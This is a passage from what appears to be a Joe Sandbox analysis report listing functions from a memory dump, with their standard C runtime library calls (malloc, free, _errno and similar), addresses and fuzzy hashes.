Function 000001EA846AA4CC Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000001EA846AA4FA

Part of subcall function 000001EA846A979C: _errno.LIBCMT ref: 000001EA846A97BC

free.LIBCMT ref: 000001EA846AA50F
free.LIBCMT ref: 000001EA846AA530
free.LIBCMT ref: 000001EA846AA545
free.LIBCMT ref: 000001EA846AA559
free.LIBCMT ref: 000001EA846AA565
free.LIBCMT ref: 000001EA846AA590
free.LIBCMT ref: 000001EA846AA5B1
free.LIBCMT ref: 000001EA846AA5CA
free.LIBCMT ref: 000001EA846AA5FB

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
Instruction ID: 0b8d70e7ecbf5c12aebef211d8fb46a0faafac5ac2e89a67cdc8c674cb1968ed
Opcode Fuzzy Hash: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
Instruction Fuzzy Hash: 33410B30255F498FFFE4EB58D895BE933E1FF58316FE840BD980AC2191CA2CA8459716

Function 000001EA8469360C Relevance: 11.6, APIs: 9, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846936A9

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

malloc.LIBCMT ref: 000001EA846936B3

Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A9870
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9875

malloc.LIBCMT ref: 000001EA846936BE
free.LIBCMT ref: 000001EA8469387E
free.LIBCMT ref: 000001EA84693886
free.LIBCMT ref: 000001EA8469388E

Part of subcall function 000001EA846944F0: malloc.LIBCMT ref: 000001EA8469453A
Part of subcall function 000001EA846944F0: malloc.LIBCMT ref: 000001EA84694545
Part of subcall function 000001EA846944F0: free.LIBCMT ref: 000001EA8469462C
Part of subcall function 000001EA846944F0: free.LIBCMT ref: 000001EA84694634

free.LIBCMT ref: 000001EA8469389A
free.LIBCMT ref: 000001EA846938A7
free.LIBCMT ref: 000001EA846938B4

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
Instruction ID: 117828a90019ad86f8ca4b7a84a866b76e8b976b2601a5d3ca3a641f9b820d32
Opcode Fuzzy Hash: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
Instruction Fuzzy Hash: CE91D930318B894BD759AA6CD441BFD77E1EF88705F9406BED88AC3282DE74EC464687

Function 000001EA846BA090 Relevance: 10.6, APIs: 7, Instructions: 108COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001EA846BA0C4

Part of subcall function 000001EA846AC7E0: _getptd.LIBCMT ref: 000001EA846AC7F6
Part of subcall function 000001EA846AC7E0: __updatetlocinfo.LIBCMT ref: 000001EA846AC82B
Part of subcall function 000001EA846AC7E0: __updatetmbcinfo.LIBCMT ref: 000001EA846AC852

_errno.LIBCMT ref: 000001EA846BA0DF
_invalid_parameter_noinfo.LIBCMT ref: 000001EA846BA0EA

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
Instruction ID: 97e17d0ca75dedc728f371df68d3372b8dc58e83cddb1e91d4a4427b0b1936a4
Opcode Fuzzy Hash: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
Instruction Fuzzy Hash: EB315B30518B884FD798DF18E485BAE72E0FF58311F9502ADE859C7396DA70EC408786

Function 000001EA846AA370 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846AA396

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846AA3A2
__crtIsPackagedApp.LIBCMT ref: 000001EA846AA3B3
_dosmaperr.LIBCMT ref: 000001EA846AA3FD

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
Instruction ID: 735b6ad0d363a77dabc556896e643d7d9c1b3d1b204e0063d453003d5da13281
Opcode Fuzzy Hash: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
Instruction Fuzzy Hash: 8731B230604F494FEB58EB68C805BAD72E1FF98356F5445AEA80AC32D2D778E8419743

Function 000001EA846B4AA8 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846B4AC1

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__lock_fhandle.LIBCMT ref: 000001EA846B4B09
__doserrno.LIBCMT ref: 000001EA846B4B3E
_errno.LIBCMT ref: 000001EA846B4B45
_unlock_fhandle.LIBCMT ref: 000001EA846B4B55

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
Instruction ID: 9930c044af1eb67e4a03ed0f2aa7eca1d9ac9b28dbe976f719d18eaa1ddfdae7
Opcode Fuzzy Hash: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
Instruction Fuzzy Hash: B221B331608B854EF725AF68DCA1BED76E0FF45316F8901BCEE16872D6D664B8008793

Function 000001EA846AB070 Relevance: 9.3, APIs: 6, Instructions: 257COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846AB0AC

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846AB0B7
memcpy_s.LIBCMT ref: 000001EA846AB17C
_fileno.LIBCMT ref: 000001EA846AB1E7
_filbuf.LIBCMT ref: 000001EA846AB215
_errno.LIBCMT ref: 000001EA846AB265

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
Instruction ID: d4da4724aaa580503bd65e2ba5da495371699b37ad2da0e42669f007011df9cb
Opcode Fuzzy Hash: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
Instruction Fuzzy Hash: 99612930218F494AE728D62C9445BBD72E1EFA5B22F98037ED955C32D6DA60BC5192C3

Function 000001EA846AAB80 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846AAAD7

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846AAAE2
_getstream.LIBCMT ref: 000001EA846AAB02
_errno.LIBCMT ref: 000001EA846AAB14
_errno.LIBCMT ref: 000001EA846AAB26
_openfile.LIBCMT ref: 000001EA846AAB54

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
Instruction ID: 95ed65b3b2f51fba7590685ffe8b282c8c4a81d76182a1042c5206965236fff8
Opcode Fuzzy Hash: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
Instruction Fuzzy Hash: 2D21B530618F894FF754EB28D405BAE76E1EF59342F8405FEAD45D3292DA24EC405783

Function 000001EA84693170 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846931BD

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

malloc.LIBCMT ref: 000001EA846931C8

Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A9870
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9875

free.LIBCMT ref: 000001EA846932AF
free.LIBCMT ref: 000001EA846932B7
free.LIBCMT ref: 000001EA846932BF
free.LIBCMT ref: 000001EA846932CB
free.LIBCMT ref: 000001EA846932D8

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
Instruction ID: 2d4d428b147fd59ccae9e149b8db9981a05fd9c8bbb960e2462d2d1eb3bfb917
Opcode Fuzzy Hash: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
Instruction Fuzzy Hash: F951C630718F4A4BEB5D9A28D451ABD77E0FF49315F9001BEDC4AC3286DA54EC428686

Function 000001EA8469BA74 Relevance: 7.8, APIs: 6, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001EA846A316C: malloc.LIBCMT ref: 000001EA846A3188

malloc.LIBCMT ref: 000001EA8469BB1E

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

Part of subcall function 000001EA846A91B4: malloc.LIBCMT ref: 000001EA846A9204

Part of subcall function 000001EA846A91B4: realloc.LIBCMT ref: 000001EA846A9213

malloc.LIBCMT ref: 000001EA8469BBED
_snprintf.LIBCMT ref: 000001EA8469BC6B
_snprintf.LIBCMT ref: 000001EA8469BC93
_snprintf.LIBCMT ref: 000001EA8469BCBA
free.LIBCMT ref: 000001EA8469BE28

Part of subcall function 000001EA846A7898: malloc.LIBCMT ref: 000001EA846A78CC
Part of subcall function 000001EA846A7898: free.LIBCMT ref: 000001EA846A7A83

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
Instruction ID: 054ff3a9d99766e976bc0033df5d7a500a4751d3daf544cc8d98cdf9cdd9e8bc
Opcode Fuzzy Hash: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
Instruction Fuzzy Hash: F6B19030604B844AEB58FB68D456BFD76E5EF94702F8404BEAC46C32C3DE68E9059683

Function 000001EA8469F14C Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 000001EA846A316C: malloc.LIBCMT ref: 000001EA846A3188

Part of subcall function 000001EA846AAB80: _errno.LIBCMT ref: 000001EA846AAAD7
Part of subcall function 000001EA846AAB80: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AAAE2

fseek.LIBCMT ref: 000001EA8469F1E8

Part of subcall function 000001EA846AB404: _errno.LIBCMT ref: 000001EA846AB42C
Part of subcall function 000001EA846AB404: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AB437

_ftelli64.LIBCMT ref: 000001EA8469F1F0

Part of subcall function 000001EA846AB478: _errno.LIBCMT ref: 000001EA846AB496
Part of subcall function 000001EA846AB478: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AB4A1

fseek.LIBCMT ref: 000001EA8469F200

Part of subcall function 000001EA846AB404: _fseek_nolock.LIBCMT ref: 000001EA846AB455

malloc.LIBCMT ref: 000001EA8469F240

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

fclose.LIBCMT ref: 000001EA8469F2FD

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
Instruction ID: 7af5323e56a2eaf23cf188b688e918c8e3befb089d8364514b3a2564d4ce8e85
Opcode Fuzzy Hash: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
Instruction Fuzzy Hash: 01518A31618A484FD74CEB28D455BFD76E1FF98701F9042BEE84BC32D7DD68A9068682

Function 000001EA846B46B4 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 000001EA846B46E1

Part of subcall function 000001EA846AE1B8: _FF_MSGBANNER.LIBCMT ref: 000001EA846AE1D5
Part of subcall function 000001EA846AE1B8: _NMSG_WRITE.LIBCMT ref: 000001EA846AE1DF

_lock.LIBCMT ref: 000001EA846B46F4
_lock.LIBCMT ref: 000001EA846B474F
_calloc_crt.LIBCMT ref: 000001EA846B4806

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
Instruction ID: 0aa5ec5986b8f560f4f86afca9c4c54ceebaa63d38b1f3acf39d7aa8c0488c71
Opcode Fuzzy Hash: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
Instruction Fuzzy Hash: 5551D970518B898BE7149F18CC857A9B7E0FF55311F9541BDEC4AC71A2D678E842CB83

Function 000001EA846944F0 Relevance: 7.7, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA8469453A

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

malloc.LIBCMT ref: 000001EA84694545

Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A9870
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9875

free.LIBCMT ref: 000001EA8469462C
free.LIBCMT ref: 000001EA84694634
free.LIBCMT ref: 000001EA84694640
free.LIBCMT ref: 000001EA8469464D

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
Instruction ID: 12b694f2fb799696d4a11512192e511119f6d5454376ff4538c6792ab4cf1b7c
Opcode Fuzzy Hash: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
Instruction Fuzzy Hash: 0741087032CB8D4BEB589A288401ABE36E4EF95312F94017DD887C3243ED64E8078792

Function 000001EA846AC654 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 000001EA846AC671

Part of subcall function 000001EA846AFDB4: _errno.LIBCMT ref: 000001EA846AFDBD
Part of subcall function 000001EA846AFDB4: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AFDC8

_errno.LIBCMT ref: 000001EA846AC681

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_errno.LIBCMT ref: 000001EA846AC69D
_isatty.LIBCMT ref: 000001EA846AC6FE
_getbuf.LIBCMT ref: 000001EA846AC70A

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
Instruction ID: d91645bc66f7d5467ce93508fdc13d2807dc1b20f3d507ca16629f1ecc35726f
Opcode Fuzzy Hash: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
Instruction Fuzzy Hash: 08518E30214B884FEB98EF28C485BA976F0EF59311F9816EDDC16CB2D6D724E8419782

Function 000001EA846A5DE4 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846A5E13

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

_snprintf.LIBCMT ref: 000001EA846A5E2B

Part of subcall function 000001EA846A9B9C: _errno.LIBCMT ref: 000001EA846A9BD3
Part of subcall function 000001EA846A9B9C: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9BDE

free.LIBCMT ref: 000001EA846A5E42

Part of subcall function 000001EA846A979C: _errno.LIBCMT ref: 000001EA846A97BC

malloc.LIBCMT ref: 000001EA846A5E92
_snprintf.LIBCMT ref: 000001EA846A5EAA
free.LIBCMT ref: 000001EA846A5ED2

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
Instruction ID: e7fd8d9fd390ba17f0080eb74bc9e8c63453d37ff80d63ae64ce088887839250
Opcode Fuzzy Hash: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
Instruction Fuzzy Hash: 6C41AB3031CE880FDB58EB2CA8157F877E3EB99311F9445ADD48EC3297D925AC425786

Function 000001EA8469E024 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA8469E045

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

free.LIBCMT ref: 000001EA8469E080
fwrite.LIBCMT ref: 000001EA8469E0C1
fclose.LIBCMT ref: 000001EA8469E0C9
free.LIBCMT ref: 000001EA8469E0D6

Part of subcall function 000001EA846A979C: _errno.LIBCMT ref: 000001EA846A97BC

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
Instruction ID: 3e9a18c7e6fb3cd3370fa1205527155e3c946f1e5c51b64b045992f9b2738168
Opcode Fuzzy Hash: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
Instruction Fuzzy Hash: 8221A430618F884BE784EB28C051BEE76E1FF88341F9405BDA84AC32C2DD68E9454783

Function 000001EA846B4958 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846B4969

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846B4961

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
Instruction ID: d3d75a7f04d9266fc4238d4b8b5969d31e804da725f33ac1813677acb5d28813
Opcode Fuzzy Hash: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
Instruction Fuzzy Hash: B3016D30524A8D8EE759FB64C851BEC33B0BF21327FD846ECED05861EBC66868408653

Function 000001EA846A9698 Relevance: 6.3, APIs: 5, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846A96BB

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

malloc.LIBCMT ref: 000001EA846A96C9

Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A9870
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9875

malloc.LIBCMT ref: 000001EA846A96EB
_snprintf.LIBCMT ref: 000001EA846A9706

Part of subcall function 000001EA846A9B9C: _errno.LIBCMT ref: 000001EA846A9BD3
Part of subcall function 000001EA846A9B9C: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9BDE

malloc.LIBCMT ref: 000001EA846A9721

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
Instruction ID: 8529952d0a005989b083e3691bcb3ec61fe72150f6088fd8b8c59587bfb89381
Opcode Fuzzy Hash: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
Instruction Fuzzy Hash: 0011513061CF444FEBA8EF6CA44579A76E1FB8C311F5449AEE44AC3396DA34AC4647C2

Function 000001EA846AAB8C Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846AABC4

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846AABCF
_flush.LIBCMT ref: 000001EA846AAC81
_fileno.LIBCMT ref: 000001EA846AACA2

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
Instruction ID: 390e1e5f52f59d7e6973ad820f859ce17f2a14c1ecb853cf7b998ac1e8348541
Opcode Fuzzy Hash: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
Instruction Fuzzy Hash: 9951F870218F490BF668ED5CD445BB972E1EF98352F6402BFDC5AC31D2EA50EC569283

Function 000001EA846900D0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 000001EA84690117
clock.LIBCMT ref: 000001EA84690124
clock.LIBCMT ref: 000001EA8469012D
clock.LIBCMT ref: 000001EA8469013A

Memory Dump Source

